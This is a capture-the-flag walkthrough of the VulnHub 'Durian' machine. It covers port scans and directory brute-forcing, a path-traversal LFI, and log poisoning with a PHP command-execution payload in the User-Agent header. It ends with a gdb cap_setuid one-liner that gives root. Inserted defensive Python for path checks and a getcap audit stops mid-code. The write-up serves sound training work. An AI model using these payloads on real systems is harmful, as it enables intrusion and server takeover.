Preface
A few words
This box took me about two days. I ran into a lot of unexpected trouble and at one point nearly gave up, but in the end I chewed through it, and now I want to share some of that experience.
While working on this box, the following write-ups helped me a great deal:
https://www.hackingarticles.in/durian-1-vulnhub-walkthrough/
https://www.hacknos.com/durian-vulnhub-walkthrough/
https://github.com/Meowmycks/OSCPprep-Durian
Attack path
Information gathering
Initial recon
Host discovery
┌──(kali㉿kali)-[~]
└─$ nmap -sn 10.10.10.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:46 EST
Nmap scan report for 10.10.10.1
Host is up (0.00066s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:EB:65:BE (VMware)
Nmap scan report for 10.10.10.24
Host is up (0.00026s latency).
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F9:92:85 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.06 seconds
The new box's IP is 10.10.10.24
Run a port scan, a UDP port scan and a default-script scan against it.
Port scan:
┌──(kali㉿kali)-[~]
└─$ nmap -p- 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:52 EST
Nmap scan report for 10.10.10.24
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
7080/tcp open empowerid
8088/tcp open radan-http
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds
UDP scan
┌──(kali㉿kali)-[~]
└─$ nmap -sU --top-ports 100 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:53 EST
Nmap scan report for 10.10.10.24
Host is up (0.00030s latency).
Not shown: 96 open|filtered udp ports (no-response)
PORT STATE SERVICE
9/udp closed discard
1813/udp closed radacct
5353/udp closed zeroconf
32769/udp closed filenet-rpc
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
Default script scan:
┌──(kali㉿kali)-[~]
└─$ nmap --script=vuln 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-22 20:52 EST
Nmap scan report for 10.10.10.24
Host is up (0.00033s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /blog/: Blog
|_ /blog/wp-login.php: WordPress login page.
8088/tcp open radan-http
MAC Address: 00:0C:29:67:34:BF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 329.57 seconds
Further detailed scan and fingerprinting
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ nmap -sV -sC -sT -O -p 22,80,7080,8088 10.10.10.24 --min-rate 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 21:59 EST
Nmap scan report for 10.10.10.24
Host is up (0.00071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 28:1c:64:fa:9c:c3:d2:d4:bb:76:3d:3b:10:e2:b1:25 (RSA)
| 256 da:b2:e1:7f:7c:1b:58:cf:fd:4f:74:e9:23:6d:51:d7 (ECDSA)
|_ 256 41:e1:0c:2b:d4:26:e8:d3:71:bb:9d:f9:61:56:63:c0 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Durian
|_http-server-header: Apache/2.4.38 (Debian)
7080/tcp open ssl/empowerid LiteSpeed
|_http-server-header: LiteSpeed
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
| http-title: LiteSpeed WebAdmin Console
|_Requested resource was https://10.10.10.24:7080/login.php
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 302 Found
| x-powered-by: PHP/5.6.36
| x-frame-options: SAMEORIGIN
| x-xss-protection: 1;mode=block
| referrer-policy: same-origin
| x-content-type-options: nosniff
| set-cookie: LSUI37FE0C43B84483E0=50dedeb0254050877e777fcd607a6ef5; path=/; secure; HttpOnly
| expires: Thu, 19 Nov 1981 08:52:00 GMT
| cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| pragma: no-cache
| set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| location: /login.php
| content-type: text/html; charset=UTF-8
| content-length: 0
| date: Sun, 25 Jan 2026 16:05:09 GMT
| server: LiteSpeed
| alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| HTTPOptions:
| HTTP/1.0 302 Found
| x-powered-by: PHP/5.6.36
| x-frame-options: SAMEORIGIN
| x-xss-protection: 1;mode=block
| referrer-policy: same-origin
| x-content-type-options: nosniff
| set-cookie: LSUI37FE0C43B84483E0=5a211f21e65eeaee59307faf7b8dd9a4; path=/; secure; HttpOnly
| expires: Thu, 19 Nov 1981 08:52:00 GMT
| cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
| pragma: no-cache
| set-cookie: LSID37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSPA37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| set-cookie: LSUI37FE0C43B84483E0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
| location: /login.php
| content-type: text/html; charset=UTF-8
| content-length: 0
| date: Sun, 25 Jan 2026 16:05:09 GMT
| server: LiteSpeed
|_ alt-svc: quic=":7080"; ma=2592000; v="43,46", h3-Q043=":7080";
| ssl-cert: Subject: commonName=durian/organizationName=LiteSpeedCommunity/stateOrProvinceName=NJ/countryName=US
| Not valid before: 2020-09-08T02:05:32
|_Not valid after: 2022-12-07T02:05:32
8088/tcp open radan-http LiteSpeed
|_http-title: Durian
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| etag: "2fd-5f56ea13-40590;;;"
| last-modified: Tue, 08 Sep 2020 02:18:59 GMT
| content-type: text/html
| content-length: 765
| accept-ranges: bytes
| date: Sun, 25 Jan 2026 16:04:53 GMT
| server: LiteSpeed
| connection: close
| <html>
| <body bgcolor="white">
| <head>
| <title>Durian</title>
| <meta name="description" content="We Are Still Alive!">
| <meta name="keywords" content="Hacked by Ind_C0d3r">
| <meta name="robots" content="index, follow">
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
| <meta name="language" content="English">
| </head>
| <link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
| <style type="text/css">
| @font-face {
| font-family: 'Righteous', cursive;
| font-family: 'Saira Stencil One', cursive;
| </style>
| <center><br><br>
| <img src="https://www.producemarketguide.com/sites/default/files/Commoditi
| Socks5:
| HTTP/1.1 400 Bad Request
| content-type: text/html
| cache-control: private, no-cache, max-age=0
| pragma: no-cache
| content-length: 1209
| date: Sun, 25 Jan 2026 16:04:53 GMT
| server: LiteSpeed
| connection: close
| <!DOCTYPE html>
| <html style="height:100%">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
| <title> 400 Bad Request
| </title></head>
| <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
| <div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
| style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1>
| style="margin-top:20px;font-size: 30px;">Bad Request
| </h2>
| <p>It is not a valid request!</p>
|_ </div></div><div style="color:#f0f0
|_http-server-header: LiteSpeed
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:67:34:BF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.85 seconds
We can see the following ports are open:
22 – the normal SSH service
80 – the classic HTTP service
7080 – encrypted authentication / identity management service, something like a unified identity provider
8088 – radan-http; the exact service is unclear, possibly used for a proxy
One thing to note: this box's HTTP services are served randomly on ports 80 and 8000.
Further probing
Run directory scans against ports 80 and 8088.
Scan results for port 80
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.24:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/blog (Status: 301) [Size: 309] [--> http://10.10.10.24/blog/]
/server-status (Status: 403) [Size: 276]
/cgi-data (Status: 301) [Size: 313] [--> http://10.10.10.24/cgi-data/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
Scan results for port 8088
gobuster dir -u http://10.10.10.24:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
All the paths have exactly the same length, so access is probably restricted in some way; let's try visiting them.
I also scanned 7080, trying to find a path that is not strictly redirected to the authentication page.
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.10.24:7080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:7080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 0 / 1 (0.00%)
2026/01/22 22:16:50 the server returns a status code that matches the provided options for non existing urls. http://10.10.10.24:7080/39187153-9521-4115-8d9d-285ba3c757ad => 301 (redirect to https://10.10.10.24:7080/39187153-9521-4115-8d9d-285ba3c757ad) (Length: 0). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length
Rejected.
First look at the /blog and /blog/wp-login.php pages found earlier by the default script scan.
The /blog page

Nothing useful there. The /blog/wp-login.php page:
There is a login form; I tried SQL injection without result.
Now look at the docs file on port 8088.

This should be the authentication service that is running.
Search Kali for historical vulnerabilities in this service:
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ searchsploit OpenLiteSpeed 1.7
Exploit Title                                                          | Path
-----------------------------------------------------------------------|----------------------------
Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting              | multiple/webapps/49727.txt
Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) | multiple/webapps/49483.txt
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)  | multiple/webapps/49556.py
-----------------------------------------------------------------------|----------------------------
Shellcodes: No Results
There is a command injection vulnerability, but it requires credentials, i.e. you have to be logged in.
A login prompt pops up under the /protect directory.

I tried test/test.
No response.
Try the /cgi-data directory.

There is a getImage.php file.
Try accessing it.

Page appearance
Since getImage means "get an image", I guessed it probably takes a parameter.
Attacking
Fuzz the parameter name with ffuf:
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/mywordlists/parameter.txt -u http://10.10.10.24/cgi-data/getImage.php?FUZZ=../../../../../etc/passwd -fs 241
________________________________________________
:: Method : GET
:: URL : http://10.10.10.24/cgi-data/getImage.php?FUZZ=../../../../../etc/passwd
:: Wordlist : FUZZ: /usr/share/mywordlists/parameter.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 241
________________________________________________
file [Status: 200, Size: 1729, Words: 37, Lines: 43, Duration: 1ms]
:: Progress: [5848/5848] :: Job [1/1] :: 49 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
We can see that the file parameter gives output.
Opening this link shows the full content.

I tried reading the shadow file to gauge how high www-data's privileges are and whether there might be a chance to escalate later via Shellshock (the path shows this is a CGI program).

Not accessible.
At this point we have an LFI (local file inclusion) vulnerability, but getting a foothold from it is still somewhat difficult.
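As an added example (not code from the walkthrough or from the box's own getImage.php), here is the path-confinement check a fixed image handler needs, written in Python so it runs as-is. The naive resolver shows what the page observed: `file=../../../../../etc/passwd` walks out of the web root; the hardened resolver rejects it. The root directory and file names are constructed assumptions.

```python
import os
from typing import List, Optional, Tuple

# Assumed document root for the image handler; stands in for the box's
# /var/www/html/cgi-data directory (an assumption, not taken from the target).
IMAGE_ROOT = "/var/www/html/cgi-data/img"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


def naive_image_path(root: str, requested: str) -> str:
    """What an unguarded include($_GET['file'])-style handler effectively does:
    join and normalise, with no check that the result stays under `root`."""
    return os.path.normpath(os.path.join(root, requested))


def safe_image_path(root: str, requested: str) -> Optional[str]:
    """Return the resolved path only if it stays inside `root` and has an image
    extension; otherwise return None (the caller should answer 400/404).

    Checks, in order:
      1. NUL bytes and absolute paths are rejected outright.
      2. The extension must be on the allow-list (stops logs, /etc files, .php).
      3. realpath() collapses '..' and symlinks; the result must still sit under root.
    """
    if "\x00" in requested or os.path.isabs(requested):
        return None
    if os.path.splitext(requested)[1].lower() not in ALLOWED_EXT:
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))
    try:
        inside = os.path.commonpath([root_real, candidate]) == root_real
    except ValueError:  # different drives on Windows
        inside = False
    return candidate if inside else None


def triage(requests: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Classify a batch of `file` parameter values as (value, naive result, safe result)."""
    return [(r, naive_image_path(IMAGE_ROOT, r), safe_image_path(IMAGE_ROOT, r))
            for r in requests]


if __name__ == "__main__":
    # Constructed sample values: one legitimate name, the traversal seen on the box,
    # an absolute log path of the kind used for log poisoning, and a harmless '..'.
    for value, naive, safe in triage([
        "durian.jpg",
        "../../../../../etc/passwd",
        "/var/log/durian.log/access.log",
        "thumbs/../durian.jpg",
    ]):
        print(f"{value!r:36} naive={naive!r:42} safe={safe!r}")
```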
So I decided to scan the directories further.
Testing for a file upload (the extension-priority problem in directory scanning)
gobuster dir -u http://10.10.10.24:8088 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sql,.tar,.rar,.zip
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: sql,tar,rar,zip,php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/upload.php (Status: 200) [Size: 1770]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 1543906 / 1543906 (100.00%)
===============================================================
Finished
===============================================================
Try accessing upload.php

No interaction at all.
The existence of upload.php suggests the server has a file upload feature; combined with our LFI (local file inclusion) vulnerability, getting a shell should be fairly easy.
Server extension handling
Here I made a huge mistake: I did not add the .html extension, and so I missed an attack path.
A note on why my first scan did not include the html extension: I originally did not know which extensions to scan first. I once saw 红笔 scan these six, so I copied them without understanding the reason, and that led to this mistake. Afterwards I looked into the priority between .html and .php files; roughly it goes like this:
For a file name without an extension, the server first checks the directory.
What happens depends on the middleware's settings.
Apache and Nginx consult different configuration files to decide the default resolution.
For example:
Apache example configuration (.htaccess or httpd.conf)
DirectoryIndex index.php index.html
Apache's default initial settings look for a .php file first, then a .html file.
This is why I missed the file upload feature; the author of that write-up probably had different settings on his box, so he did not scan with the html extension.
So in many cases the details decide success or failure.
With that understood, let's add a scan with the html extension:
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.24:8088
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 765]
/cgi-bin (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/cgi-bin/]
/img (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/docs/]
/upload.html (Status: 200) [Size: 6520]
/css (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/css/]
/protected (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://10.10.10.24:8088/blocked/]
Progress: 441116 / 441116 (100.00%)
===============================================================
Finished
===============================================================
Visit upload.html

There is indeed a file upload feature; try uploading a shell.

Only jpg files are allowed, but since we already have local file inclusion, we don't need to worry much about how it gets parsed.
The upload path is /tmp/phpOA0P3X
Try accessing it to trigger the reverse shell.
For some reason, the reverse shell failed.
Could it be that /tmp has no execute permission?
At this point I was somewhat at a loss, so I chose to look at other people's write-ups.
LFI + log poisoning
Most of the write-ups mentioned a term I had never come across, log poisoning, so I went and studied the technique.
The idea continues along the LFI line: since we want to poison a log, we need to know which logs can be accessed and will be parsed as code.
https://www.hackingarticles.in/durian-1-vulnhub-walkthrough/ mentions that
with Burp, a custom wordlist of log paths and "durian" (the machine name), it took a whole day to obtain the path
/var/log/durian.log/access.log
which is made by combining Apache's default log path /var/log/access.log with durian.log.
But that method is rather clumsy; we can instead try reading Apache's configuration files to find the log file location.
So I tried
/etc/apache2/apache2.conf
/etc/httpd/httpd.conf
/etc/apache2/sites-available/000-default.conf
In the first two, the log file path is replaced by a variable; in the last configuration file we successfully obtained the directory of the log files.

It is located at /var/log/durian.log/access.log
And we also got the error log path, located at
/var/log/durian.log/access.log
Also,
https://github.com/Meowmycks/OSCPprep-Durian
mentions that the default log paths of the authentication service on port 7080 are unchanged:
/usr/local/lsws/logs/access.log
/usr/local/lsws/logs/error.log
All of these paths can be tried; I chose /var/log/durian.log/access.log for the log poisoning attempt.
So I first looked at the actual log content.
The log records the User-Agent, so I captured a request with Burp and tried to poison via the User-Agent header.
Here I ran into two big problems that held me up for a while. When I wrote the payload into the User-Agent,
the server actually returned a 500 error, and we could no longer take the next step through the access.log file.
This confused me, so I compared my verification command with the other write-ups to work out the cause.
The comparison showed that where I had used
<?php system("id");?>
their verification command used single quotes,
and from the error in error.log
GET /cgi-data/getImage.php?file=/var/log/durian.log/access.log&cmd=id HTTP/1.1
Host: 10.10.10.24
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) <?php system($_GET['cmd']);?> AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
This errored again, showing
PHP Notice: Undefined variable: daemon in /var/www/html/test.php on line 184
An undefined variable. That struck me as strange: how could the variable be undefined when my cmd had clearly been injected? So I went back to reading.
After understanding the log poisoning flow, I understood the cause of the error: log poisoning needs the command injected first and only then the parameter passed via the URL, because the parameter is only read when the PHP code is parsed during file inclusion. In other words, every read of the log parses first and then writes; on the first parse our code has not been written yet, so the cmd parameter has nowhere to go and it errors. It has to be done in separate steps.
With that understood, I tried again.
It ran successfully.
Now we have RCE (remote command execution) via LFI + log poisoning.
So I tried to execute a reverse shell directly.
It returned status code 400, which puzzled me, so I went back to the two write-ups; in one of them the author wrote
Both write-ups mention that there was no way to get a foothold by directly executing a reverse shell, so I guessed: maybe www-data is restricted somehow and cannot run bash commands? But was that really so? Actually I made a huge mistake here, but let's set that aside for now.
So I thought of using wget with a temporary server on Kali to upload a reverse shell, and then triggering it either by direct parsing or through the file inclusion vulnerability.
Little did I know, this was the beginning of a nightmare.
The nightmare begins
So I tried to make the box run wget to fetch my shell file.
First prepare the shell.php file:
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ locate reverse-shell |grep share
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/metasploit-framework/docs/metasploit-framework.wiki/How-to-use-a-reverse-shell-in-Metasploit.md
/usr/share/webshells/perl/perl-reverse-shell.pl
Then copy it to the current directory (or to /tmp) with cp, and edit the IP and port in the file with vim.

Then we need to start a temporary server in this directory. Here I made the choice that cost me several hours: I started the temporary server with php.

And start a listener.

Then use our earlier parameter for RCE, fetching shell.php from Kali with wget.

At this point I discovered something very frightening:

My listener had connected to itself (Kali)!
And I had not even parsed the PHP yet or triggered the reverse shell. How could that be? At the time I couldn't understand it, so I chose to ignore it for now; the question is answered later on.
Restart the listener and visit http://10.10.10.24/blog/shell.php
It actually says connection refused??? Why???
Was something wrong with my Kali? So I started round after round of checks.
First I tested whether Kali could receive reverse shells from other boxes, tested whether this box could ping Kali, consulted the almighty DeepSeek, and compared the write-ups many times.
The only difference from the write-ups was that they used python for the temporary server, so I tried starting the temporary server with python.
┌──(kali㉿kali)-[~/Vulnhub/Durian]
└─$ python3 -m http.server 80
Traceback (most recent call last):
File "<frozen runpy>", line 198, in _run_module_as_main
File "<frozen runpy>", line 88, in _run_code
File "/usr/lib/python3.13/http/server.py", line 1323, in <module>
test(
~~~~^
HandlerClass=handler_class,
^^^^^^^^^^^^^^^^^^^^^^^^^^^
...<3 lines>...
protocol=args.protocol,
^^^^^^^^^^^^^^^^^^^^^^^
)
^
File "/usr/lib/python3.13/http/server.py", line 1270, in test
with ServerClass(addr, HandlerClass) as httpd:
~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 457, in __init__
self.server_bind()
~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 1317, in server_bind
return super().server_bind()
~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 136, in server_bind
socketserver.TCPServer.server_bind(self)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 478, in server_bind
self.socket.bind(self.server_address)
~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^
OSError: [Errno 98] Address already in use
It errored. In fact the answer was already very close here, but I had been troubleshooting for 8 hours, so I chose to take a break and reset my thinking.
Regrouping
After summarising, I found that my RCE seemed to have basically no command restrictions, because during troubleshooting I had used a great many commands to test connectivity between Kali and the box. So I realised the box probably wasn't restricting bash commands; rather some step in the chain had gone wrong.
After handing the packet of the earlier direct reverse-shell command to an AI, it told me I had not URL-encoded it!!!
I can't believe I overlooked such a small thing. So I URL-encoded the reverse shell before doing the RCE, while listening on port 1234.

And successfully got a reverse shell.
Not easy :(
Privilege escalation
First the usual information gathering; check sudo privileges first.
www-data@durian:/var/www/html/cgi-data$ sudo -l
sudo -l
Matching Defaults entries for www-data on durian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on durian:
(root) NOPASSWD: /sbin/shutdown
(root) NOPASSWD: /bin/ping
www-data@durian:/var/www/html/cgi-data$
It shows that shutdown and ping can be run without a password.
Neither is of much use.
Now look at the getcap results.
www-data@durian:/var/www/html/cgi-data$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/gdb = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
gdb has the set-uid capability.
The AI told me to try this command:
/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
A note: https://github.com/Meowmycks/OSCPprep-Durian?tab=readme-ov-file says this privilege escalation method can be found on GTFOBins: https://gtfobins.org/
but I did not find it there.
So I tried it.

Privilege escalation succeeded; grab the flag.
Got it. This box is done at this point.
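An added audit helper (mine, not from the walkthrough or GTFOBins) that parses `getcap -r /` output in both the older `path = caps+flags` style shown above and the newer `path caps=flags` style, and rates each entry the way a defender reviewing this box would: a privilege capability on a binary that runs arbitrary code, like cap_setuid on gdb, is the worst case. The capability groups and interpreter list are my own assumptions; the third sample line is constructed.

```python
import os
import re
from typing import Dict, List, Optional

# Capability groups used for rating. These sets are this example's own choice
# (an assumption), not an official list: identity caps let a process become
# root, the others bypass file permissions or reach into the kernel.
IDENTITY_CAPS = {"cap_setuid", "cap_setgid", "cap_setfcap"}
FS_BYPASS_CAPS = {"cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner"}
KERNEL_CAPS = {"cap_sys_admin", "cap_sys_module", "cap_sys_ptrace", "cap_sys_rawio"}
# Binaries that run arbitrary code for whoever invokes them (debuggers,
# interpreters, editors); a privilege cap on one of these is the worst case.
ARBITRARY_CODE_BINARIES = {"gdb", "python", "perl", "ruby", "php", "node", "vim", "vi", "lua"}

# Constructed sample: the two lines this walkthrough got from `getcap -r / 2>/dev/null`
# (older libcap output style) plus one constructed line in the newer "path caps=flags" style.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/gdb = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.9 cap_setuid=ep
"""

OLD_STYLE = re.compile(r"^(?P<path>\S+)\s*=\s*(?P<caps>\S+)$")
NEW_STYLE = re.compile(r"^(?P<path>\S+)\s+(?P<caps>\S+=\S+)$")


def parse_getcap_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one getcap line into {'path', 'caps', 'flags'}; None if it does not parse."""
    line = line.strip()
    match = OLD_STYLE.match(line) or NEW_STYLE.match(line)
    if not match:
        return None
    capspec = match.group("caps")
    # old style: cap_a,cap_b+ep   new style: cap_a,cap_b=ep
    sep = "+" if "+" in capspec else "="
    names, flags = capspec.rsplit(sep, 1)
    return {
        "path": match.group("path"),
        "caps": {c.strip().lower() for c in names.split(",") if c.strip()},
        "flags": flags,
    }


def assess(entry: Dict[str, object]) -> Dict[str, object]:
    """Attach a severity and the reasons behind it to a parsed entry."""
    caps = set(entry["caps"])
    binary = os.path.basename(str(entry["path"]))
    # python3.9 -> python, so versioned interpreters are recognised too
    runs_code = (binary in ARBITRARY_CODE_BINARIES
                 or binary.rstrip("0123456789.") in ARBITRARY_CODE_BINARIES)
    reasons = []
    for label, group in (("changes uid/gid", IDENTITY_CAPS),
                         ("bypasses file permissions", FS_BYPASS_CAPS),
                         ("reaches into the kernel", KERNEL_CAPS)):
        hit = caps & group
        if hit:
            reasons.append(f"{label}: {','.join(sorted(hit))}")
    if reasons and runs_code:
        severity = "HIGH"      # arbitrary code + a privilege cap: straight path to root
    elif reasons:
        severity = "MEDIUM"    # privilege cap, but on a fixed-purpose binary
    else:
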